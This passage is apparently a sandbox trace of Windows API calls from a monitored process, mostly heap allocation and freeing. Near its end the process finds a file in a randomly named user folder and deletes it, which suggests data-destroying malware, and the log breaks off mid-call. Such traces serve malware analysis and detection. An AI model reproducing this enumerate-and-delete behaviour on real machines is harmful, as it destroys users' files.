HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0112.333] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0112.333] FreeLibrary (hLibModule=0x756e0000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0112.333] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0112.333] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0112.333] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.333] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0112.333] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0112.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0112.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0112.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0112.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0112.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0112.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0112.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0112.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.334] CloseHandle (hObject=0x298) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eaa90 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0112.334] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0112.335] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0112.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0112.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0112.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0112.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0112.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.335] CloseHandle (hObject=0x258) returned 1 [0112.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0112.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0112.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0112.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0112.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0112.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0112.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0112.338] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0112.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0112.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0112.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0112.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0112.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x453d2c0 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0112.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0112.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0112.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0112.340] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0112.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0112.341] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav", lpFilePart=0x0) returned 0x32 [0112.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0112.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431dc08 [0112.341] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\dle rck7umm-.wav")) returned 0x20 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0112.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369bb8 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d7d0 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0112.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0112.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80dd97f0, ftCreationTime.dwHighDateTime=0x1d5ead4, ftLastAccessTime.dwLowDateTime=0x1883d600, ftLastAccessTime.dwHighDateTime=0x1d5e189, ftLastWriteTime.dwLowDateTime=0x1883d600, ftLastWriteTime.dwHighDateTime=0x1d5e189, nFileSizeHigh=0x0, nFileSizeLow=0x5975, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="dle rck7Umm-.wav", cAlternateFileName="DLERCK~1.WAV")) returned 0x41ac280 [0112.343] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\dle rck7Umm-.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\dle rck7umm-.wav")) returned 1 [0112.396] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80dd97f0, ftCreationTime.dwHighDateTime=0x1d5ead4, 